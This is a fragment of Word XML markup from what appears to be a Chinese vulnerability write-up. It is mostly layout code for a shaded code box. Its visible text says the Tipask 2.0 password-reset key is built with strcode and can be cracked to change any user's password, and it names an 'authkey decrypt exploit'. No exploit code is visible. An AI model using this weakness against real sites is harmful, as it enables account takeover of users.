          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>重置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>链</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>接的关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>字串是由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-54"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>strcode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="37" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s5843" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:18.6pt;width:337.5pt;height:116.05pt;z-index:661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printf(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color w:val="333333"/>
                    </w:rPr>
                    <w:t>--------------------------------------------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-----------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467"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>Tipask 2.0 authkey decrypt exploit Author</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>:ztz</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> Blog:http://**.**.**.**/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</w:rPr>
        <w:t>产生，因此可以利用破解后的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-90"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来达到任意密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改功能。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6"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:group id="_x0000_s5604" style="position:absolute;margin-left:80.85pt;margin-top:72.25pt;width:337.25pt;height:572.2pt;z-index:-364312;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordorigin="1617,1445" coordsize="6745,11444">
            <v:rect id="_x0000_s5842" style="position:absolute;left:1617;top:1445;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5841" style="position:absolute;left:1797;top:1688;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5840" style="position:absolute;left:1617;top:1951;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5839" style="position:absolute;left:1797;top:2014;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5838" style="position:absolute;left:2761;top:2014;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5837" style="position:absolute;left:2881;top:2014;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5836" style="position:absolute;left:1617;top:2277;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5835" style="position:absolute;left:1617;top:2603;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5834" style="position:absolute;left:1797;top:2666;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5833" style="position:absolute;left:2038;top:2666;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5832" style="position:absolute;left:2158;top:2666;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5831" style="position:absolute;left:2881;top:2666;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5830" style="position:absolute;left:3002;top:2666;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5829" style="position:absolute;left:3122;top:2666;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5828" style="position:absolute;left:3243;top:2666;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5827" style="position:absolute;left:3484;top:2666;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5826" style="position:absolute;left:3604;top:2666;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5825" style="position:absolute;left:1617;top:2929;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5824" type="#_x0000_t75" style="position:absolute;left:1797;top:2992;width:600;height:200">
              <v:imagedata r:id="rId73" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s5823" style="position:absolute;left:2397;top:2992;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5822" style="position:absolute;left:3361;top:2992;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5821" style="position:absolute;left:3481;top:2992;width:844;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5820" style="position:absolute;left:4325;top:2992;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5819" style="position:absolute;left:4425;top:2992;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5818" style="position:absolute;left:4525;top:2992;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5817" style="position:absolute;left:4625;top:2992;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5816" style="position:absolute;left:4725;top:2992;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5815" style="position:absolute;left:4825;top:2992;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5814" style="position:absolute;left:4925;top:2992;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5813" style="position:absolute;left:5025;top:2992;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5812" style="position:absolute;left:5125;top:2992;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5811" style="position:absolute;left:5225;top:2992;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5810" style="position:absolute;left:5586;top:2992;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5809" style="position:absolute;left:5707;top:2992;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5808" style="position:absolute;left:6550;top:2992;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5807" style="position:absolute;left:6671;top:2992;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5806" style="position:absolute;left:7032;top:2992;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5805" style="position:absolute;left:7153;top:2992;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5804" style="position:absolute;left:8117;top:2992;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5803" style="position:absolute;left:1617;top:3255;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5802" style="position:absolute;left:1797;top:3318;width:2530;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5801" style="position:absolute;left:4327;top:3318;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5800" style="position:absolute;left:4427;top:3318;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5799" style="position:absolute;left:4527;top:3318;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5798" style="position:absolute;left:4627;top:3318;width:362;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5797" style="position:absolute;left:4989;top:3318;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5796" style="position:absolute;left:5109;top:3318;width:844;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5795" style="position:absolute;left:5953;top:3318;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5794" style="position:absolute;left:6073;top:3318;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5793" style="position:absolute;left:6194;top:3318;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5792" style="position:absolute;left:6314;top:3318;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5791" style="position:absolute;left:7037;top:3318;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5790" style="position:absolute;left:1617;top:3581;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5789" style="position:absolute;left:1797;top:3644;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5788" style="position:absolute;left:1617;top:3907;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5787" style="position:absolute;left:1797;top:3970;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5786" style="position:absolute;left:1617;top:4233;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5785" type="#_x0000_t75" style="position:absolute;left:1797;top:4296;width:700;height:200">
              <v:imagedata r:id="rId76" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s5784" style="position:absolute;left:2497;top:4296;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5783" style="position:absolute;left:1617;top:4559;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5782" style="position:absolute;left:1797;top:4622;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5781" style="position:absolute;left:1617;top:4885;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5780" style="position:absolute;left:1617;top:5211;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5779" style="position:absolute;left:1797;top:5274;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5778" style="position:absolute;left:2279;top:5274;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5777" style="position:absolute;left:2399;top:5274;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5776" style="position:absolute;left:2520;top:5274;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5775" style="position:absolute;left:2640;top:5274;width:1085;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5774" style="position:absolute;left:1617;top:5537;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5773" style="position:absolute;left:1797;top:5600;width:1084;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5772" style="position:absolute;left:2881;top:5600;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5771" style="position:absolute;left:3002;top:5600;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5770" style="position:absolute;left:3122;top:5600;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5769" style="position:absolute;left:3243;top:5600;width:1687;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5768" style="position:absolute;left:1617;top:5863;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5767" style="position:absolute;left:1797;top:5926;width:1446;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5766" style="position:absolute;left:3243;top:5926;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5765" style="position:absolute;left:3363;top:5926;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5764" style="position:absolute;left:3484;top:5926;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5763" style="position:absolute;left:3604;top:5926;width:1085;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5762" style="position:absolute;left:1617;top:6189;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5761" style="position:absolute;left:1617;top:6515;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5760" style="position:absolute;left:1797;top:6578;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5759" style="position:absolute;left:2279;top:6578;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5758" style="position:absolute;left:2399;top:6578;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5757" style="position:absolute;left:2520;top:6578;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5756" style="position:absolute;left:2640;top:6578;width:603;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5755" style="position:absolute;left:3243;top:6578;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5754" style="position:absolute;left:3363;top:6578;width:1326;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5753" style="position:absolute;left:4689;top:6578;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5752" style="position:absolute;left:4809;top:6578;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5751" style="position:absolute;left:1617;top:6841;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5750" style="position:absolute;left:1797;top:6904;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5749" style="position:absolute;left:2279;top:6904;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5748" style="position:absolute;left:2399;top:6904;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5747" style="position:absolute;left:2520;top:6904;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5746" style="position:absolute;left:2640;top:6904;width:3133;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5745" style="position:absolute;left:5773;top:6904;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5744" style="position:absolute;left:5894;top:6904;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5743" style="position:absolute;left:6135;top:6904;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5742" style="position:absolute;left:6255;top:6904;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5741" style="position:absolute;left:6376;top:6904;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5740" style="position:absolute;left:6496;top:6904;width:844;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5739" style="position:absolute;left:1617;top:7167;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5738" style="position:absolute;left:1797;top:7230;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5737" style="position:absolute;left:2399;top:7230;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5736" style="position:absolute;left:2520;top:7230;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5735" style="position:absolute;left:3484;top:7230;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5734" style="position:absolute;left:3604;top:7230;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5733" style="position:absolute;left:4086;top:7230;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5732" style="position:absolute;left:4207;top:7230;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5731" style="position:absolute;left:1617;top:7493;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5730" style="position:absolute;left:1797;top:7556;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5729" style="position:absolute;left:2399;top:7556;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5728" style="position:absolute;left:2520;top:7556;width:1084;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5727" style="position:absolute;left:3604;top:7556;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5726" style="position:absolute;left:3725;top:7556;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5725" style="position:absolute;left:4086;top:7556;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5724" style="position:absolute;left:4207;top:7556;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5723" style="position:absolute;left:5171;top:7556;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5722" style="position:absolute;left:5291;top:7556;width:362;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5721" style="position:absolute;left:5653;top:7556;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5720" style="position:absolute;left:5773;top:7556;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5719" style="position:absolute;left:6255;top:7556;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5718" style="position:absolute;left:6376;top:7556;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5717" style="position:absolute;left:6617;top:7556;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5716" style="position:absolute;left:6737;top:7556;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5715" style="position:absolute;left:7460;top:7556;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5714" style="position:absolute;left:7581;top:7556;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5713" style="position:absolute;left:1617;top:7819;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5712" style="position:absolute;left:1797;top:7882;width:1566;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5711" style="position:absolute;left:3363;top:7882;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5710" style="position:absolute;left:3484;top:7882;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5709" style="position:absolute;left:4327;top:7882;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5708" style="position:absolute;left:4448;top:7882;width:1325;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5707" style="position:absolute;left:1617;top:8145;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5706" style="position:absolute;left:1797;top:8208;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5705" style="position:absolute;left:2399;top:8208;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5704" style="position:absolute;left:2520;top:8208;width:2530;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5703" style="position:absolute;left:1617;top:8471;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5702" style="position:absolute;left:1797;top:8534;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5701" style="position:absolute;left:2399;top:8534;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5700" style="position:absolute;left:2520;top:8534;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5699" style="position:absolute;left:2640;top:8534;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5698" style="position:absolute;left:2761;top:8534;width:3374;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5697" style="position:absolute;left:6135;top:8534;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5696" style="position:absolute;left:6255;top:8534;width:844;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5695" style="position:absolute;left:1617;top:8797;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5694" style="position:absolute;left:1797;top:8860;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5693" style="position:absolute;left:2399;top:8860;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5692" style="position:absolute;left:2520;top:8860;width:1084;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5691" style="position:absolute;left:3604;top:8860;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5690" style="position:absolute;left:3725;top:8860;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5689" style="position:absolute;left:4689;top:8860;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5688" style="position:absolute;left:4809;top:8860;width:603;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5687" style="position:absolute;left:5412;top:8860;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5686" style="position:absolute;left:5532;top:8860;width:2531;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5685" style="position:absolute;left:8063;top:8860;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5684" style="position:absolute;left:1617;top:9123;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5683" style="position:absolute;left:1797;top:9186;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5682" style="position:absolute;left:1617;top:9449;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5681" style="position:absolute;left:1797;top:9512;width:1205;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5680" style="position:absolute;left:1617;top:9775;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5679" style="position:absolute;left:1797;top:9838;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5678" style="position:absolute;left:2761;top:9838;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5677" style="position:absolute;left:2881;top:9838;width:2651;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5676" style="position:absolute;left:5532;top:9838;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5675" style="position:absolute;left:5653;top:9838;width:1205;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5674" style="position:absolute;left:1617;top:10101;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5673" style="position:absolute;left:1797;top:10164;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5672" style="position:absolute;left:1617;top:10427;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5671" type="#_x0000_t75" style="position:absolute;left:1797;top:10490;width:600;height:200">
              <v:imagedata r:id="rId73" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s5670" style="position:absolute;left:2397;top:10490;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5669" style="position:absolute;left:2879;top:10490;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5668" style="position:absolute;left:2999;top:10490;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5667" style="position:absolute;left:3120;top:10490;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5666" style="position:absolute;left:3240;top:10490;width:362;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5665" style="position:absolute;left:1617;top:10753;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5664" type="#_x0000_t75" style="position:absolute;left:1797;top:10816;width:600;height:200">
              <v:imagedata r:id="rId73" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s5663" style="position:absolute;left:2397;top:10816;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5662" style="position:absolute;left:3361;top:10816;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5661" style="position:absolute;left:3481;top:10816;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5660" style="position:absolute;left:3602;top:10816;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5659" style="position:absolute;left:3722;top:10816;width:4218;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5658" style="position:absolute;left:1617;top:11079;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5657" style="position:absolute;left:1797;top:11142;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5656" style="position:absolute;left:1897;top:11142;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5655" style="position:absolute;left:1997;top:11142;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5654" style="position:absolute;left:2097;top:11142;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5653" style="position:absolute;left:2197;top:11142;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5652" style="position:absolute;left:2297;top:11142;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
